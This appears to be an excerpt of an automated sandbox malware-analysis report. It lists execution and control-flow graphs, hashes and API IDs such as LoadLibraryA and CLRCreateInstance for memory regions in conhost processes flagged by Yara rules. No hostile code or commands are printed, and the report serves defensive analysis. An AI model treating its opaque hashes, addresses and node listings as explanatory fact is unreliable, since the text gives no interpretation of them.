                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 9CD15AB2605B8686EF609B75A4813EDA7B0FB56788F100115EA8A57F9ADF38C0D1C743
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: a83b71479b3f8ba6ccd5be5cf8e2e2b019b77fddb09fe14a9d797b0eadf1cce0
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 47817CF0713F4386FE959B75B8413D9A6B1BF87B80F084015B90B47F9ADA28C8D58A03
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: d64669ea28e803b97661f3d8c0dbdc000cf0698035ceb897a441a2758f92d6f4
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: F2515CB2306B828AEF648B25A14439CF7B0FB56B94F146115EA8B47F99CB39C491C703
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: ab34f1130aba08431ab4ff6c6e73a4b1738c0bea14b3e58355f4f9cf8cc305b0
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 87519EB2312F068ADF54CB75F444BA8B3A1FB46B98F554125AA4B47B88D779C881C702
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: ae7da703fcc8dad5278790a0e428d92c879d58410f85495a80844ec063fde9d5
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 8B616CB2605BC581EF719B25F4407DAF7A0FB86B88F044215EB9A07B99DB78D1D0CB02

                                                                                                                                                          Execution Graph

Execution Coverage: 10.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 21
Total number of Limit Nodes: 2
                                                                                                                                                          execution_graph 2537 113db11e106 2538 113db11e128 2537->2538 2539 113db11e254 LoadLibraryA 2538->2539 2540 113db11e269 2538->2540 2548 113db11e17c 2538->2548 2539->2538 2547 113db11e31d 2540->2547 2540->2548 2556 113db11d2a2 2540->2556 2542 113db11e2f3 2543 113db11e2f7 2542->2543 2549 113db11d3ba LoadLibraryA 2542->2549 2543->2542 2543->2548 2546 113db11e30c 2546->2547 2546->2548 2547->2548 2551 113db11deb2 2547->2551 2550 113db11d3df 2549->2550 2550->2546 2552 113db11def2 CLRCreateInstance 2551->2552 2554 113db11df0b 2551->2554 2552->2554 2553 113db11e0b2 2553->2548 2554->2553 2554->2554 2555 113db11e0a9 SafeArrayDestroy 2554->2555 2555->2553 2557 113db11d2af LoadLibraryA 2556->2557 2558 113db11d2c7 2557->2558 2558->2542 2559 113db11d2af LoadLibraryA 2560 113db11d2c7 2559->2560

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
control_flow_graph 123 113db11e106-113db11e157 call 113db11f2de * 3 130 113db11e189 123->130 131 113db11e159-113db11e15c 123->131 132 113db11e18c-113db11e19d 130->132 131->130 133 113db11e15e-113db11e161 131->133 133->130 134 113db11e163-113db11e17a 133->134 136 113db11e19e-113db11e1c9 call 113db11f85e call 113db11f87e 134->136 137 113db11e17c-113db11e183 134->137 143 113db11e206-113db11e21d call 113db11f2de 136->143 144 113db11e1cb-113db11e200 call 113db11f492 call 113db11f352 136->144 137->130 138 113db11e185 137->138 138->130 143->130 149 113db11e223-113db11e224 143->149 144->143 153 113db11e462-113db11e473 144->153 152 113db11e22a-113db11e230 149->152 154 113db11e269-113db11e273 152->154 155 113db11e232 152->155 156 113db11e475-113db11e47f 153->156 157 113db11e4a6-113db11e4c7 call 113db11f87e 153->157 159 113db11e275-113db11e290 call 113db11f2de 154->159 160 113db11e2a1-113db11e2aa 154->160 158 113db11e234-113db11e236 155->158 156->157 163 113db11e481-113db11e49f call 113db11f87e 156->163 184 113db11e4c9 157->184 185 113db11e4cd-113db11e4cf 157->185 164 113db11e238-113db11e23e 158->164 165 113db11e250-113db11e252 158->165 159->153 175 113db11e296-113db11e29f 159->175 161 113db11e2c5-113db11e2c8 160->161 162 113db11e2ac-113db11e2b6 call 113db11d4d2 160->162 161->153 169 113db11e2ce-113db11e2d8 161->169 162->153 180 113db11e2bc-113db11e2c3 162->180 163->157 164->165 171 113db11e240-113db11e24e 164->171 165->154 172 113db11e254-113db11e267 LoadLibraryA 165->172 177 113db11e2da-113db11e2db 169->177 178 113db11e2e2-113db11e2e9 169->178 171->158 171->165 172->152 175->159 175->160 177->178 181 113db11e31d-113db11e321 178->181 182 113db11e2eb-113db11e2ec 178->182 180->178 186 113db11e327-113db11e349 181->186 187 113db11e3fd-113db11e405 181->187 189 113db11e2ee call 113db11d2a2 182->189 184->185 185->132 186->153 199 113db11e34f-113db11e369 call 113db11f85e 186->199 190 113db11e457-113db11e45d call 113db11e90e 187->190 191 113db11e407-113db11e40d 187->191 192 113db11e2f3-113db11e2f5 189->192 190->153 195 113db11e424-113db11e436 call 113db11deb2 191->195 196 113db11e40f-113db11e415 191->196 197 113db11e304-113db11e307 call 113db11d3ba 192->197 198 113db11e2f7-113db11e2fe 192->198 210 113db11e448-113db11e455 call 113db11d952 195->210 211 113db11e438-113db11e443 call 113db11e4d6 195->211 196->153 200 113db11e417-113db11e422 call 113db11ed6a 196->200 203 113db11e30c-113db11e30e 197->203 198->153 198->197 213 113db11e389-113db11e3b2 199->213 214 113db11e36b-113db11e36e 199->214 200->153 203->181 207 113db11e310-113db11e317 203->207 207->153 207->181 210->153 211->210 213->153 220 113db11e3b8-113db11e3f8 213->220 214->187 217 113db11e374-113db11e387 call 113db11f5e2 214->217 222 113db11e3fa-113db11e3fb 217->222 220->153 220->222 222->187
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction ID: 9c00539e9249260716eba31fc00eef61109c650f191e800916ef56cf1fe1a7fa
                                                                                                                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction Fuzzy Hash: DAC1FB31714D059BEF5CEAB8D4D57F9B3D1FB9A340FD40129D56AC318EDB20EA0A8A81

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fec1939adbecdef4d02354f4b30f75f0cce8a73c49ab4cf8ccd6d9ddafe3637b
                                                                                                                                                          • Instruction ID: 12e8897e41489217f74c9d5f2ecb505bd957de18c524055f313e0387c790be09
                                                                                                                                                          • Opcode Fuzzy Hash: fec1939adbecdef4d02354f4b30f75f0cce8a73c49ab4cf8ccd6d9ddafe3637b
                                                                                                                                                          • Instruction Fuzzy Hash: E5F18230908A8D8FEFA8EF28C8557E977E1FF54311F44427AE84DC7295CE74A9458B82

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3858bdd14f4e86fcebb238384309ec45571ddd1dc020c8d37960f120391ff5c3
                                                                                                                                                          • Instruction ID: 57354ca99c60bffc4866089cfbc3de809ece112ee1471e8abbacb803f90d8270
                                                                                                                                                          • Opcode Fuzzy Hash: 3858bdd14f4e86fcebb238384309ec45571ddd1dc020c8d37960f120391ff5c3
                                                                                                                                                          • Instruction Fuzzy Hash: 74E19230908A4E8FEFA8EF28C8567E977E1EF54311F44427ED84DC7291DE78A9458B81

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7$(7$07$07
                                                                                                                                                          • API String ID: 0-2090760396
                                                                                                                                                          • Opcode ID: 5b470d70df8177ad5391f00d7939003b3f76206515f52ab48b94f6c28c1e1d07
                                                                                                                                                          • Instruction ID: 353b99f02c4a1217f2e7b4e641088f81cf9443de126140ca1335919c4c443f17
                                                                                                                                                          • Opcode Fuzzy Hash: 5b470d70df8177ad5391f00d7939003b3f76206515f52ab48b94f6c28c1e1d07
                                                                                                                                                          • Instruction Fuzzy Hash: FA51F170A18A458FEB88EB2C8459679B7D1FF9E750F44067DE44EC7292CE64AC428741

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7$(7$07
                                                                                                                                                          • API String ID: 0-4208908032
                                                                                                                                                          • Opcode ID: cf7ebe9595bb48ad3c94ea021dba0d8f4a39edbe8ae1bd0a41f7b1bf7cbec79e
                                                                                                                                                          • Instruction ID: 38ac9373bb80cc029fc869ecdccd75454afacc5807bebcfa83395be79f559c20
                                                                                                                                                          • Opcode Fuzzy Hash: cf7ebe9595bb48ad3c94ea021dba0d8f4a39edbe8ae1bd0a41f7b1bf7cbec79e
                                                                                                                                                          • Instruction Fuzzy Hash: B351E370A0CA858FE788EB2C8459779B7E1FF9E750F4402BDE44EC7292DD68AC428751

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902440814-0
                                                                                                                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction ID: 99f6e06824e34cf13949a1f76bd70ee7a54e2ebb2b2e89afb77e2388a7d0d651
                                                                                                                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction Fuzzy Hash: BF81A131208B088FDB68EF78D888BE677E5FF95301F404A6DD49BC7159EA31E6498B41

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 87$6
                                                                                                                                                          • API String ID: 0-451483919
                                                                                                                                                          • Opcode ID: a1da54d94d30d444e69c1340cfa8d91aa2e07eb6ab2324c9040092a24f4049e0
                                                                                                                                                          • Instruction ID: ee8317dceed67ae5c8bbc095da29696bbd03a428c5dd8010da4c85dadbe5dd59
                                                                                                                                                          • Opcode Fuzzy Hash: a1da54d94d30d444e69c1340cfa8d91aa2e07eb6ab2324c9040092a24f4049e0
                                                                                                                                                          • Instruction Fuzzy Hash: 22515B31A08A858FE796FB38C4586797BE1FF87710F5C00B9D44AC71A3CE68A946C751

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction ID: c59f22ca7e00887ab798bdf71a69efe06071fc4ab5daedc385fcf0b6b3338ad4
                                                                                                                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction Fuzzy Hash: 3B31C03170CA084FEF5CAA69E8492EA73D5EBD8350F001169ED4BC328ED974EE0687C1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: x6
                                                                                                                                                          • API String ID: 0-1066045226
                                                                                                                                                          • Opcode ID: 7dc1030c3015b0f7e6730720d79c8a047bb3e91965c18cf2f6b8a002c14ec418
                                                                                                                                                          • Instruction ID: faa873d9a40e40dc96f080918bc5f8e866f1248a59c5aa2e9f9ee4fc237b97df
                                                                                                                                                          • Opcode Fuzzy Hash: 7dc1030c3015b0f7e6730720d79c8a047bb3e91965c18cf2f6b8a002c14ec418
                                                                                                                                                          • Instruction Fuzzy Hash: C8C18E30A18A494FEB89FB38C45A668B7E1EF49355F5401B9D40ECB3A3CE26F941C791

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000113DAF00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_113daf00000_conhost.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 364 7ff7c14d010d-7ff7c14d010e
Strings
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID: x6
• API String ID: 0-1066045226

Control-flow Graph

Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000014.00000002.1402932482.00007FF7C14D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff7c14d0000_conhost.jbxd
Similarity
• API ID:
• String ID: 6$6$6$6
• API String ID: 0-2957942223

Execution Graph

Execution Coverage: 9.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 21
Total number of Limit Nodes: 2

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction ID: a28049785033af0cf0f6daea1a0ec64e58c0cb964c1d76251fd3206026112adf
                                                                                                                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                                          • Instruction Fuzzy Hash: FBC158302149099BFF79EA248C997FBF3D3FFA9302F554129D84AC61C5DA30E8539681

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Control-flow graph (rendered graph not preserved; executed/not-executed block colouring lost): function at 7ff7c14e50f6, basic blocks 308-369; no Windows API calls in the graph; internal call to 7ff7c14e55b4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cccebe5d9a45fd8d438a67bfef48e723ffdeca9f5a85d14bf8d6c0bc8008782
                                                                                                                                                          • Instruction ID: fd5e344ba027b1edc4b9c6d84dee2bd27be856a76910309d582d91d558ac835f
                                                                                                                                                          • Opcode Fuzzy Hash: 7cccebe5d9a45fd8d438a67bfef48e723ffdeca9f5a85d14bf8d6c0bc8008782
                                                                                                                                                          • Instruction Fuzzy Hash: 70F1A630908A8D8FEBA8EF28C8557E9B7D1FF54311F44827EE84DC7295CB74A9458B81

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Control-flow graph (rendered graph not preserved; executed/not-executed block colouring lost): function at 7ff7c14e5ea2, basic blocks 370-429; no Windows API calls in the graph; internal call to 7ff7c14e6330
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c20420866e1f796e335a75e46ebe0eb54f3f79249dabf43f878eb56f013242bb
                                                                                                                                                          • Instruction ID: 75708384a9401136f8882cf93d9281b04617483668c09c7cc701c3bb32f55cb7
                                                                                                                                                          • Opcode Fuzzy Hash: c20420866e1f796e335a75e46ebe0eb54f3f79249dabf43f878eb56f013242bb
                                                                                                                                                          • Instruction Fuzzy Hash: 10E1A530908A4D8FEBA9EF28C8557E9B7E1FF54310F44827ED84DC7291CE74A9458B81

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902440814-0
                                                                                                                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction ID: d433f0286607cde1e13e5e32b8d04a89c3be4590db7bfc6b496e00f0c6c7e045
                                                                                                                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                                          • Instruction Fuzzy Hash: 09816431218B088FDB68DF28D888BD7B7E6FFA5301F014A6DD89BC7191EA31E5458B51

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C_H$`/z
                                                                                                                                                          • API String ID: 0-812352719
                                                                                                                                                          • Opcode ID: ffa688a060170df360d23dfb03a88e69e8c6e640ec7794a764fdeccfd2e77701
                                                                                                                                                          • Instruction ID: 271ca8e14122191a2437cd73c9703e3771fd333e4b889033e72264fc4fbb1311
                                                                                                                                                          • Opcode Fuzzy Hash: ffa688a060170df360d23dfb03a88e69e8c6e640ec7794a764fdeccfd2e77701
                                                                                                                                                          • Instruction Fuzzy Hash: 8A815971B0D9C59FE756BB7C48691B9FBE0EF56720B8844FAC08AC7293CD58A902C311

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C_H$`/z
                                                                                                                                                          • API String ID: 0-812352719
                                                                                                                                                          • Opcode ID: 0605839cdce2a61d8f555131ce764d015bed9a6ac7834f77d2b3aa2c53cc6860
                                                                                                                                                          • Instruction ID: f429b5ef15cdfedba77d6bf9034898ad9c45c63417be3f604f102d22c0ca366f
                                                                                                                                                          • Opcode Fuzzy Hash: 0605839cdce2a61d8f555131ce764d015bed9a6ac7834f77d2b3aa2c53cc6860
                                                                                                                                                          • Instruction Fuzzy Hash: 25511671B099894FE396FB7C4899279FBD1EF5A61078845FDD04AC72A2DD58A9028301

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Control-flow graph (rendered graph not preserved; executed/not-executed block colouring lost): function at 21e7b55d3ba, basic blocks 244-261; Windows API called: LoadLibraryA; internal calls to 21e7b55f85e
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
